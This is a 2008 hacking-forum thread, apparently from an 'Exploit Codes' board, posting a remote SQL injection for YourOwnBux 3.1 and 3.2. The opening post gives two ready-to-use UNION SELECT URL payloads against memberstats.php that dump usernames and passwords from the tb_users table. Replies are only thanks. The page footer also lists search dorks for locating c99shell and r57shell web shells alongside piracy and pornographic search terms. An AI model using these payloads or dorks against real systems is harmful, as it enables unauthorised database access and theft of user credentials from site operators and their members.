BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes
Reload this Page YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability
Register FAQ Members List Calendar Arcade Mark Forums Read

Notices
Welcome to the BadHackerz forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact contact us.

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack Thread Tools Display Modes
Old 08-28-2008   #1 (permalink)
Studentz
 
Armageddon's Avatar
 
Join Date: Jun 2006

Location: On port u forgot to secure!
Age: 18
Posts: 6,125
Thanks: 57
Thanked 171 Times in 126 Posts
Rep Power: 250 Armageddon has a reputation beyond repute
Armageddon has a reputation beyond reputeArmageddon has a reputation beyond reputeArmageddon has a reputation beyond reputeArmageddon has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to Armageddon
Default YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability
Code:
YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

3.2 Beta version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*

3.1 version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
Armageddon is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
The Following 2 Users Say Thank You to Armageddon For This Useful Post:
greendays (09-20-2008), kushlove (09-10-2008)

Old 09-10-2008   #2 (permalink)
Member
 
Join Date: May 2008

Posts: 68
Thanks: 28
Thanked 3 Times in 2 Posts
Rep Power: 28 kushlove will become famous soon enoughkushlove will become famous soon enough
Default
not done mr senior
kushlove is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 09-20-2008   #3 (permalink)
Junior Member
 
devilhackerz's Avatar
 
Join Date: Sep 2008

Posts: 45
Thanks: 90
Thanked 0 Times in 0 Posts
Rep Power: 13 devilhackerz will become famous soon enough
Default
thank you so much
devilhackerz is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 10-01-2008   #4 (permalink)
Leecher
 
Join Date: Oct 2008

Posts: 14
Thanks: 1
Thanked 0 Times in 0 Posts
Rep Power: 12 bioibrahim will become famous soon enough
Default
thank you so much
bioibrahim is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 10-25-2008   #5 (permalink)
Leecher
 
Join Date: Oct 2008

Posts: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 xneoz will become famous soon enough
Default
thank you so much
xneoz is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks

« Previous Thread | Next Thread »


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability Armageddon Exploit Codes 0 08-19-2008 02:09 PM
I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability Armageddon Exploit Codes 0 08-19-2008 12:34 PM
Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability Armageddon Exploit Codes 0 08-13-2008 11:52 AM
Remote SQL Injection Vulnerability Wh!5t|eR Exploit Codes 0 08-03-2008 08:22 AM
I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability Armageddon Exploit Codes 0 06-02-2008 12:35 PM

These are the 100 most searched terms
Search Cloud
(intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack bad hackerz badgewinners.com badhackerz badhackerz.com c99shell c99shell powered by admin c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm cousin ki chudai dhcp sniffer eset nod32 rapidshare evan poczik evllp.dll free tamil sex stories hotmail phisher idm 512 infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare nod32 rapidshare.com pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rapidshare rosetta stone rosetta stone application rosetta stone rapidshare rosetta stone romanian rosetta stone update safe-mode: off (not secure) drwxrwxrwx c99shell sigma 1.7 softjtag tamil sex stories tera patrick rapidshare vbulletin 3.7.0 exploit vbulletin exploit www.badhackerz.com ... powered by Simple Search Cloud

All times are GMT +5.5. The time now is 11:04 AM.

Contact Us - Archive - Privacy Statement - Top

Website Design by How.ToDesignYour.Com
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios